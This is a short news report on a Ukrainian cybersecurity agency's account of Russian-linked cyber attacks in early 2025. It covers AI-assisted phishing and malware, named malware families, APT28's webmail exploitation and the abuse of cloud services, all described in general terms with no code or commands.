Ukraine’s State Service for Special Communications and Information Protection (SSSCIP) said Russian-linked hackers increased their use of artificial intelligence in cyber attacks in the first half of 2025 and recorded 3,018 incidents, up from 2,575 in the second half of 2024.
The agency said attackers are employing AI not only to craft phishing messages but that some malware samples show signs of being generated with AI. SSSCIP highlighted an attack cluster it attributed to UAC-0219 that used a PowerShell data-stealing malware called WRECKSTEEL, saying there is evidence the sample was developed with AI tools.
SSSCIP reported that attacks against local authorities and military entities increased compared with the second half of 2024, while incidents targeting government and energy sectors declined. The report catalogued multiple phishing campaigns attributed to different subgroups that used booby-trapped RAR archives, credential stealers and backdoors, naming families such as HOMESTEEL, GIFTEDCROOK, Amatera Stealer, Strela Stealer and a C# backdoor known as Kalambur.
The agency also said Russia-linked APT28 exploited cross-site scripting and other flaws in Roundcube and Zimbra webmail software to carry out zero-click compromises, injecting code via APIs to harvest credentials, contact lists and to set filters forwarding emails to attacker-controlled mailboxes. SSSCIP described a further technique that created hidden HTML blocks with autocomplete enabled to exfiltrate auto-filled credentials from browsers.
SSSCIP said the Sandworm group continued operations against energy, defence, internet service providers and research organisations and that several threat groups increasingly abused legitimate cloud and hosting services — including Dropbox, Google Drive, OneDrive, Bitbucket, Cloudflare Workers, Telegram, Telegra.ph, Teletype.in, Firebase, ipfs.io and mocky.io – to host malware, phishing pages or exfiltrate data.